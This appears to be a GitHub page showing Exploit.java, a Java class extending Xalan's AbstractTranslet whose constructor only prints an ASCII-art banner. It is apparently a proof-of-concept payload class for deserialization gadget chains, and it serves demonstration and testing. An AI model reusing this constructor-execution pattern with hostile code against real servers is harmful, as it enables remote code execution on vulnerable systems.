-
Notifications
You must be signed in to change notification settings - Fork 80
Expand file tree
/
Copy pathExploit.java
More file actions
30 lines (23 loc) · 2.25 KB
/
Exploit.java
File metadata and controls
30 lines (23 loc) · 2.25 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
import java.util.Properties;
import org.apache.xalan.xsltc.DOM;
import org.apache.xalan.xsltc.TransletException;
import org.apache.xml.dtm.DTMAxisIterator;
import org.apache.xml.serializer.SerializationHandler;
public class Exploit extends org.apache.xalan.xsltc.runtime.AbstractTranslet {
public Exploit() throws Exception {
super.transletVersion = CURRENT_TRANSLET_VERSION;
System.err.println("███████╗ ██████╗ ████████╗ ██████╗ ███╗ ███╗ █████╗ ██╗ ██╗ ██████╗ ██████╗ ██╗██╗██╗");
System.err.println("██╔════╝██╔═══██╗╚══██╔══╝██╔═══██╗████╗ ████║██╔══██╗╚██╗ ██╔╝██╔═══██╗██╔══██╗ ██║██║██║");
System.err.println("███████╗██║ ██║ ██║ ██║ ██║██╔████╔██║███████║ ╚████╔╝ ██║ ██║██████╔╝ ██║██║██║");
System.err.println("╚════██║██║ ██║ ██║ ██║ ██║██║╚██╔╝██║██╔══██║ ╚██╔╝ ██║ ██║██╔══██╗ ╚═╝╚═╝╚═╝");
System.err.println("███████║╚██████╔╝ ██║ ╚██████╔╝██║ ╚═╝ ██║██║ ██║ ██║ ╚██████╔╝██║ ██║ ██╗██╗██╗");
System.err.println("╚══════╝ ╚═════╝ ╚═╝ ╚═════╝ ╚═╝ ╚═╝╚═╝ ╚═╝ ╚═╝ ╚═════╝ ╚═╝ ╚═╝ ╚═╝╚═╝╚═╝");
}
@Override
public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {
}
@Override
public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler)
throws TransletException {
}
}